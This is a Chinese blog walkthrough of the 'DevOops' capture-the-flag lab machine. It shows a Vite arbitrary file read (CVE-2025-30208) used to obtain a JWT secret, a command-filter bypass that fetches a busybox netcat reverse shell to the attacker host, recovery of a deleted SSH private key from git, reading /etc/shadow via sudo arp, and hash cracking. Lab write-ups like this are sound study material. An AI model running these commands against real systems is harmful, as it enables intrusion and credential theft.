Pepster'Blog
Temp-DevOops-Walkthrough
城南花已开 Lv6
  2025-04-27 15:18:13   2025-05-12 01:27:09  3.3k 字  19 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.157  08:00:27:3b:09:80       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e0:e5:17       VMware, Inc.
^C
export ip=192.168.60.157
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.157:3000
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-27 14:50 CST
Initiating ARP Ping Scan at 14:50
Scanning 192.168.60.157 [1 port]
Completed ARP Ping Scan at 14:50, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:50
Completed Parallel DNS resolution of 1 host. at 14:50, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 14:50
Scanning 192.168.60.157 [1 port]
Discovered open port 3000/tcp on 192.168.60.157
Completed SYN Stealth Scan at 14:50, 0.04s elapsed (1 total ports)
Nmap scan report for 192.168.60.157
Host is up, received arp-response (0.00039s latency).
Scanned at 2025-04-27 14:50:12 CST for 0s

PORT     STATE SERVICE REASON
3000/tcp open  ppp     syn-ack ttl 64
MAC Address: 08:00:27:3B:09:80 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

只开放了一个端口3000

尝试访问一下

发现是vue.js的新手指南

image

枚举目录,实在是有点慢

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
❯ gobuster dir -u http://$ip:3000 -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 50 -x php,html,zip,txt -b 404,403 --exclude-length 414
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.157:3000
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] Exclude Length:          414
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.txt                 (Status: 200) [Size: 301]
/server               (Status: 200) [Size: 21764]
/sign                 (Status: 200) [Size: 189]
/execute              (Status: 401) [Size: 48]

分别访问一下 server sign execute

server中可以看到源代码信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
❯ curl $ip:3000/server
import __vite__cjsImport0_express from "/node_modules/.vite/deps/express.js?v=8bc9628c"; const express = __vite__cjsImport0_express.__esModule ? __vite__cjsImport0_express.default : __vite__cjsImport0_express;
import __vite__cjsImport1_jsonwebtoken from "/node_modules/.vite/deps/jsonwebtoken.js?v=8bc9628c"; const jwt = __vite__cjsImport1_jsonwebtoken.__esModule ? __vite__cjsImport1_jsonwebtoken.default : __vite__cjsImport1_jsonwebtoken;
import "/node_modules/.vite/deps/dotenv_config.js?v=8bc9628c"
import __vite__cjsImport3_child_process from "/@id/__vite-browser-external:child_process"; const exec = __vite__cjsImport3_child_process["exec"];
import __vite__cjsImport4_util from "/@id/__vite-browser-external:util"; const promisify = __vite__cjsImport4_util["promisify"];

const app = express();

const address = 'localhost';
const port = 3001;

const exec_promise = promisify(exec);

const COMMAND_FILTER = process.env.COMMAND_FILTER
    ? process.env.COMMAND_FILTER.split(',')
        .map(cmd => cmd.trim().toLowerCase())
        .filter(cmd => cmd !== '')
    : [];

app.use(express.json());

function is_safe_command(cmd) {
    if (!cmd || typeof cmd !== 'string') {
        return false;
    }
    if (COMMAND_FILTER.length === 0) {
        return false;
    }

    const lower_cmd = cmd.toLowerCase();

    for (const forbidden of COMMAND_FILTER) {
        const regex = new RegExp(`\\b${forbidden.replace(/[.*+?^${}()|[\]\\]/g, '\\$&')}\\b|^${forbidden.replace(/[.*+?^${}()|[\]\\]/g, '\\$&')}$`, 'i');
        if (regex.test(lower_cmd)) {
            return false;
        }
    }

    if (/[;&|]/.test(cmd)) {
        return false;
    }
    if (/[<>]/.test(cmd)) {
        return false;
    }
    if (/[`$()]/.test(cmd)) {
        return false;
    }

    return true;
}

async function execute_command_sync(command) {
    try {
        const { stdout, stderr } = await exec_promise(command);

        if (stderr) {
            return { status: false, data: { stdout, stderr } };
        }
        return { status: true, data: { stdout, stderr } };
    } catch (error) {
        return { status: true, data: error.message };
    }
}

app.get('/', (req, res) => {
    return res.json({
        'status': 'working',
        'data': `listening on http://${address}:${port}`
    })
})

app.get('/api/sign', (req, res) => {
    return res.json({
        'status': 'signed',
        'data': jwt.sign({
            uid: -1,
            role: 'guest',
        }, process.env.JWT_SECRET, { expiresIn: '1800s' }),
    });
});

app.get('/api/execute', async (req, res) => {
    const authorization_header_raw = req.headers['authorization'];
    if (!authorization_header_raw || !authorization_header_raw.startsWith('Bearer ')) {
        return res.status(401).json({
            'status': 'rejected',
            'data': 'permission denied'
        });
    }

    const jwt_raw = authorization_header_raw.split(' ')[1];

    try {
        const payload = jwt.verify(jwt_raw, process.env.JWT_SECRET);
        if (payload.role !== 'admin') {
            return res.status(403).json({
                'status': 'rejected',
                'data': 'permission denied'
            });
        }
    } catch (err) {
        return res.status(401).json({
            'status': 'rejected',
            'data': `permission denied`
        });
    }

    const command = req.query.cmd;

    const is_command_safe = is_safe_command(command);
    if (!is_command_safe) {
        return res.status(401).json({
            'status': 'rejected',
            'data': `this command is unsafe`
        });
    }

    const result = await execute_command_sync(command);

    return res.json({
        'status': result.status === true ? 'executed' : 'failed',
        'data': result.data
    })
});

app.listen(port, address, () => {
    console.log(`Listening on http://${address}:${port}`)
});
❯ curl $ip:3000/sign
{"status":"signed","data":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOi0xLCJyb2xlIjoiZ3Vlc3QiLCJpYXQiOjE3NDU3Mzk2MTcsImV4cCI6MTc0NTc0MTQxN30.lRzczsYCNGTEypKyVMKNy1rB83m00pZY3T2PLI83y5w"}%
❯ curl $ip:3000/execute
{"status":"rejected","data":"permission denied"}%

image

猜测可能是JWT重签

不过我们需要得知Secret Key

利用feroxbuster再次枚举目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
❯ feroxbuster -u http://$ip:3000 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x txt -x zip -x jpg

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.60.157:3000
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/common.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [txt, zip, jpg]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200      GET       15l       33w      414c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET        2l        5w      301c http://192.168.60.157:3000/@fs/.txt
200      GET        2l        5w      301c http://192.168.60.157:3000/.txt
200      GET        2l        5w      301c http://192.168.60.157:3000/@fs/.jpg
200      GET        2l        5w      301c http://192.168.60.157:3000/.jpg
403      GET       11l       32w      374c http://192.168.60.157:3000/.env

有几个返回403

从报错中可以得知项目路径在/opt/node

image

POC利用

没什么信息,尝试搜索有无相关的CVE漏洞

有个比较新的CVE-2025-30208任意文件读取漏洞

相关POC4m3rr0r/CVE-2025-30208-PoC: CVE-2025-30208 - Vite Arbitrary File Read PoC

其实也不用python脚本,直接curl就行了

具体利用就是在url的文件路径后添加?raw??或者?import&raw??实现绕过

尝试读取.env中的JWT_SECRE变量

1
2
3
❯ curl "$ip:3000/@fs/opt/node/.env?raw??"
export default "JWT_SECRET='2942szKG7Ev83aDviugAa6rFpKixZzZz'\nCOMMAND_FILTER='nc,python,python3,py,py3,bash,sh,ash,|,&,<,>,ls,cat,pwd,head,tail,grep,xxd'\n"
//# sourceMappingURL=data:application/json;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIi5lbnY/cmF3PyJdLCJzb3VyY2VzQ29udGVudCI6WyJleHBvcnQgZGVmYXVsdCBcIkpXVF9TRUNSRVQ9JzI5NDJzektHN0V2ODNhRHZpdWdBYTZyRnBLaXhaelp6J1xcbkNPTU1BTkRfRklMVEVSPSduYyxweXRob24scHl0aG9uMyxweSxweTMsYmFzaCxzaCxhc2gsfCwmLDwsPixscyxjYXQscHdkLGhlYWQsdGFpbCxncmVwLHh4ZCdcXG5cIiJdLCJuYW1lcyI6W10sIm1hcHBpbmdzIjoiQUFBQSxNQUFNLENBQUMsT0FBTyxDQUFDLENBQUMsVUFBVSxDQUFDLENBQUMsZ0NBQWdDLENBQUMsQ0FBQyxlQUFlLENBQUMsQ0FBQyxFQUFFLENBQUMsTUFBTSxDQUFDLE9BQU8sQ0FBQyxFQUFFLENBQUMsR0FBRyxDQUFDLElBQUksQ0FBQyxFQUFFLENBQUMsR0FBRyxDQUFDLENBQUMsQ0FBQyxDQUFDLENBQUMsQ0FBQyxDQUFDLENBQUMsQ0FBQyxFQUFFLENBQUMsR0FBRyxDQUFDLEdBQUcsQ0FBQyxJQUFJLENBQUMsSUFBSSxDQUFDLElBQUksQ0FBQyxHQUFHLENBQUMsQ0FBQyxDQUFDIn0=%

image

根据源代码分析得知

验证并不是通过信息Cookie来验证的

而是请求头信息authorization并且需要在开头添加Bearer

image

不过在.env中还包含了命令执行的过滤单词

基本上过滤了很多常用的命令

1
COMMAND_FILTER='nc,python,python3,py,py3,bash,sh,ash,|,&,<,>,ls,cat,pwd,head,tail,grep,xxd'

不过并未没有过滤wget

在本地编辑一下rev

经过测试靶机中只能通过ash来反弹

1
2
cat /var/www/html/rev
busybox nc 192.168.60.100 4444 -e ash

执行一下

image

1
2
3
4
5
tail -f /var/log/nginx/access.log
192.168.60.157 - - [27/Apr/2025:16:12:21 +0800] "GET /rev HTTP/1.1" 200 50 "-" "Wget"
----------------------
chmod +x rev
./rev

用户提权

监听端口

再次信心收集,得到三个用户runner hana gitea

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.60.100
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from devoops.hmv-192.168.60.157-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[!] Python agent cannot be deployed. I need to maintain at least one basic session to handle the PTY
[+] Attempting to spawn a reverse shell on 192.168.60.100:4444
[+] Got reverse shell from devoops.hmv-192.168.60.157-Linux-x86_64 😍️ Assigned SessionID <2>
[+] Shell upgraded successfully using /usr/bin/socat! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/devoops.hmv~192.168.60.157_Linux_x86_64/2025_04_27-16_29_24-963.log 📜
───────────────────────────────────────────────────────────────────────────
/bin/sh: can't access tty; job control turned off
/opt/node $ id
uid=1000(runner) gid=1000(runner) groups=1000(runner)
/tmp $ cat /etc/passwd|grep /bin/sh
root:x:0:0:root:/root:/bin/sh
runner:x:1000:1000:::/bin/sh
hana:x:1001:100::/home/hana:/bin/sh
gitea:x:102:82:gitea:/var/lib/gitea:/bin/sh

既然有个gitea用户,那必然有部署了gitea服务

查看端口开放,本地开放3002端口

1
2
3
4
5
6
7
8
9
/tmp $ netstat -luntp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3002          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:22            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:3000            0.0.0.0:*               LISTEN      2672/node
tcp6       0      0 ::1:3001                :::*                    LISTEN      2678/node

查看相关配置文件

1
2
3
4
/tmp $ ps aux|grep gitea
 2503 root      0:00 supervise-daemon gitea --start --pidfile /run/gitea.pid --respawn-delay 2 --respawn-max 5 --respawn-period 1800 --capabilities ^cap_net_bind_service --user gitea --env GITEA_WORK_DIR=/var/lib/gitea --chdir /var/lib/gitea --stdout /var/log/gitea/http.log --stderr /var/log/gitea/http.log /usr/bin/gitea -- web --config /etc/gitea/app.ini
 2504 gitea     0:23 /usr/bin/gitea web --config /etc/gitea/app.ini
 2984 runner    0:00 grep gitea

.git 泄露

配置内容如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
/etc/gitea $ cat app.ini
# Configuration cheat sheet: https://docs.gitea.io/en-us/config-cheat-sheet/
RUN_USER = gitea
RUN_MODE = prod
APP_NAME = Gitea: Git with a cup of tea
WORK_PATH = /var/lib/gitea

[repository]
ROOT = /opt/gitea/git
SCRIPT_TYPE = sh

[server]
STATIC_ROOT_PATH = /usr/share/webapps/gitea
APP_DATA_PATH = /var/lib/gitea/data
LFS_START_SERVER = true
HTTP_ADDR = 127.0.0.1
HTTP_PORT = 3002
SSH_DOMAIN = devoops.hmv
DOMAIN = devoops.hmv
ROOT_URL = http://devoops.hmv:3002/
DISABLE_SSH = false
SSH_PORT = 22
LFS_JWT_SECRET = 22TYqzojoq0KDtQOfuuiF8ir5_LlqVcc0FeNgTu-OkU
OFFLINE_MODE = true

[database]
DB_TYPE = sqlite3
PATH = /opt/gitea/db/gitea.db
SSL_MODE = disable
HOST =
NAME =
USER =
PASSWD =
SCHEMA =
LOG_SQL = false

[session]
PROVIDER = file

[log]
ROOT_PATH = /opt/gitea/log
MODE = file
LEVEL = debug

[lfs]
PATH = /var/lib/gitea/data/lfs

[mailer]
ENABLED = false

[service]
REGISTER_EMAIL_CONFIRM = false
ENABLE_NOTIFY_MAIL = false
DISABLE_REGISTRATION = true
ALLOW_ONLY_EXTERNAL_REGISTRATION = false
ENABLE_CAPTCHA = false
REQUIRE_SIGNIN_VIEW = true
DEFAULT_KEEP_EMAIL_PRIVATE = false
DEFAULT_ALLOW_CREATE_ORGANIZATION = true
DEFAULT_ENABLE_TIMETRACKING = true
NO_REPLY_ADDRESS = noreply.localhost

[openid]
ENABLE_OPENID_SIGNIN = false
ENABLE_OPENID_SIGNUP = false

[cron.update_checker]
ENABLED = false

[repository.pull-request]
DEFAULT_MERGE_STYLE = merge

[repository.signing]
DEFAULT_TRUST_MODEL = committer

[security]
INSTALL_LOCK = true
INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3NDUyMTUwNzF9.V87lLErr_xxUZ8Dy1q_ZhOhaS4z-Dxdx0utHgDMOAb4
PASSWORD_HASH_ALGO = pbkdf2

[oauth2]
JWT_SECRET = jkFHJFxfiMkVnNVRqJOz2jkDzsrsBejztF7GlN25l8M

得到仓库地址为/opt/gitea/git

并且在opt/gitea/git下存在文件夹hana

发现在node.git文件夹下存在.git相关文件,只不过文件名不是.git

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/opt/gitea/git/hana $ cd node.git/
/opt/gitea/git/hana/node.git $ ls -al
total 44
drwxr-xr-x    8 gitea    www-data      4096 Apr 21 14:36 .
drwxr-xr-x    3 gitea    www-data      4096 Apr 21 14:35 ..
-rw-r--r--    1 gitea    www-data        21 Apr 21 14:35 HEAD
drwxr-xr-x    2 gitea    www-data      4096 Apr 21 14:35 branches
-rw-r--r--    1 gitea    www-data        66 Apr 21 14:35 config
-rw-r--r--    1 gitea    www-data        73 Apr 21 14:35 description
drwxr-xr-x    6 gitea    www-data      4096 Apr 21 14:35 hooks
drwxr-xr-x    2 gitea    www-data      4096 Apr 21 14:36 info
drwxr-xr-x    3 gitea    www-data      4096 Apr 21 14:35 logs
drwxr-xr-x   24 gitea    www-data      4096 Apr 21 14:36 objects
drwxr-xr-x    4 gitea    www-data      4096 Apr 21 14:35 refs

修改文件名,查看git log

发现在1994170日志中删除了某文件

1
2
3
4
5
6
/opt/gitea/git/hana $ mkdir /tmp/repo
/opt/gitea/git/hana $ cp -r ./node.git/ /tmp/repo/.git
/opt/gitea/git/hana $ cd /tmp/repo/
/tmp/repo $ git log --oneline
1994a70 (HEAD -> main) del: oops!
02c0f91 init: init commit

查看详细log

得到一段私钥

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/tmp/repo $ git show 1994a
commit 1994a70bbd080c633ac85a339fd85a8635c63893 (HEAD -> main)
Author: azwhikaru <[email protected]>
Date:   Mon Apr 21 14:36:12 2025 +0800

    del: oops!

diff --git a/id_ed25519 b/id_ed25519
deleted file mode 100644
index a2626a4..0000000
--- a/id_ed25519
+++ /dev/null
@@ -1,7 +0,0 @@
------BEGIN OPENSSH PRIVATE KEY-----
-b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
-QyNTUxOQAAACCMB5xEc6A2I69whyZDcTSPGVsz2jivuziHAEXaAlJLrgAAAJgA8k3lAPJN
-5QAAAAtzc2gtZWQyNTUxOQAAACCMB5xEc6A2I69whyZDcTSPGVsz2jivuziHAEXaAlJLrg
-AAAEBX7jUWSgQUQgA8z8yL85Eg1WiSgijSu3C4x8TVF/G3uIwHnERzoDYjr3CHJkNxNI8Z
-WzPaOK+7OIcARdoCUkuuAAAAEGhhbmFAZGV2b29wcy5obXYBAgMEBQ==
------END OPENSSH PRIVATE KEY-----

尝试利用此私钥进行本地连接hana用户

靶机上自带socat

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/tmp/repo $ which socat
/usr/bin/socat
/tmp/repo $ socat TCP4-LISTEN:4567,fork TCP4:127.0.0.1:22
---------------------------------------
❯ nmap $ip -p 4567
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-27 17:15 CST
Nmap scan report for 192.168.60.157
Host is up (0.00048s latency).

PORT     STATE SERVICE
4567/tcp open  tram
MAC Address: 08:00:27:3B:09:80 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds

Root 提权

处理一下私钥文件,去除开头的-

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
❯ vi id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACCMB5xEc6A2I69whyZDcTSPGVsz2jivuziHAEXaAlJLrgAAAJgA8k3lAPJN
5QAAAAtzc2gtZWQyNTUxOQAAACCMB5xEc6A2I69whyZDcTSPGVsz2jivuziHAEXaAlJLrg
AAAEBX7jUWSgQUQgA8z8yL85Eg1WiSgijSu3C4x8TVF/G3uIwHnERzoDYjr3CHJkNxNI8Z
WzPaOK+7OIcARdoCUkuuAAAAEGhhbmFAZGV2b29wcy5obXYBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
chmod 600 id_rsa
❯ ssh hana@$ip -i id_rsa -p 4567
The authenticity of host '[192.168.60.157]:4567 ([192.168.60.157]:4567)' can't be established.
ED25519 key fingerprint is SHA256:m+ja7x4/2Y4oJwwOsMqZ3cHKH17py0XwXqYOMp30I4A.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.60.157]:4567' (ED25519) to the list of known hosts.

devoops:~$ id
uid=1001(hana) gid=100(users) groups=100(users),100(users)
devoops:~$ cat user.flag
flag{03d0e150ae9fc686a827b41e1969d497}

用户拥有sudo权限执行arp

1
2
3
4
5
6
7
8
9
devoops:~$ sudo -l
Matching Defaults entries for hana on devoops:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for hana:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User hana may run the following commands on devoops:
    (root) NOPASSWD: /sbin/arp

那就说明可以任意读取文件了

尝试读取/etc/shadow

1
2
3
4
5
6
devoops:~$ sudo /sbin/arp -v -f /etc/shadow
>> root:$6$FGoCakO3/TPFyfOf$6eojvYb2zPpVHYs2eYkMKETlkkilK/6/pfug1.6soWhv.V5Z7TYNDj9hwMpTK8FlleMOnjdLv6m/e94qzE7XV.:20200:0:::::
…………………………省略……………………
runner:$6$sAhdpizXgKayGrqM$lcoysLIY9dsxpwy6cyWHBS/pPbvG4KmlM06SSad0PIWrJcXssseL4EZxzF369gaPZvgyD5JXKHVCXfFUDjciP/:20199:0:99999:7:::
arp: format error on line 20 of etherfile /etc/shadow !
>> hana:$6$snNJGjzsPo.be3r1$V8NneKBkVIZYE6XOFTk1Bq2Trjyf5lO6uQUcWXogI3IiWDEiBDS2yEdck.hx0dIdmIIHGkJX7cfH3zXqKVXcc1:20199:0:99999:7:::

尝试爆破root的hash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
D:\IDM\Compressed\hashcat-6.2.6>hashcat.exe -a 0 -m 1800 hash "D:\Temp\rockyou.txt"

$6$FGoCakO3/TPFyfOf$6eojvYb2zPpVHYs2eYkMKETlkkilK/6/pfug1.6soWhv.V5Z7TYNDj9hwMpTK8FlleMOnjdLv6m/e94qzE7XV.:eris

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: $6$FGoCakO3/TPFyfOf$6eojvYb2zPpVHYs2eYkMKETlkkilK/6...zE7XV.
Time.Started.....: Sun Apr 27 17:45:22 2025 (1 min, 48 secs)
Time.Estimated...: Sun Apr 27 17:47:10 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (D:\Temp\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    76888 H/s (14.21ms) @ Accel:768 Loops:64 Thr:128 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 8355840/14344385 (58.25%)
Rejected.........: 0/8355840 (0.00%)
Restore.Point....: 8257536/14344385 (57.57%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4992-5000
Candidate.Engine.: Device Generator
Candidates.#1....: estampida02 -> ellis17102006
Hardware.Mon.#1..: Temp: 63c Fan: 29% Util:  5% Core: 126MHz Mem:1988MHz Bus:16

Started: Sun Apr 27 17:43:52 2025
Stopped: Sun Apr 27 17:47:12 2025

跑了四五分钟,不得不说密码选的也挺靠后的

1
2
❯ grep -nr "^eris$" /usr/share/wordlists/rockyou.txt
8276650:eris

尝试切换一下用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
devoops:~$ su root
Password:
/home/hana # id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/home/hana # cat /root/*
ssh://runner:Bo6xQ8Vrjm7rV1tii2gfRVW6T59jgGF7novHfQrkU3tzKmzVFxE7278L5raa2x9qCihrTrD6v0fu1m61ZkxJB5Gw@devoops.hmv
ssh://hana:UYi5Moj0BQw0QrGahe7i2Bs6VcyUcQMvmqDPs8aPdy8rJqBrcgPm33hbzBbY8j0og3aHN5bqAbKpze97BCLvuhgL@devoops.hmv
ssh://root:[email protected]

gitea://hana:saki

jwt secret:
y0u_n3v3r_kn0w_1t -> BASE58 -> 2942szKG7Ev83aDviugAa6rF

user flag:
devoooooooops! -> MD5 -> flag{03d0e150ae9fc686a827b41e1969d497}

root flag:
Debug the world -> d36u9_th3_w0r1d! -> MD5 -> flag{a834296543f4c2990909ce1c56becfba}

flag{a834296543f4c2990909ce1c56becfba}
/home/hana #
  1. 信息收集
    1. 服务探测
    2. POC利用
  2. 用户提权
    1. .git 泄露
  3. Root 提权
总字数 546.8k
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
  1. 信息收集
    1. 服务探测
    2. POC利用
  2. 用户提权
    1. .git 泄露
  3. Root 提权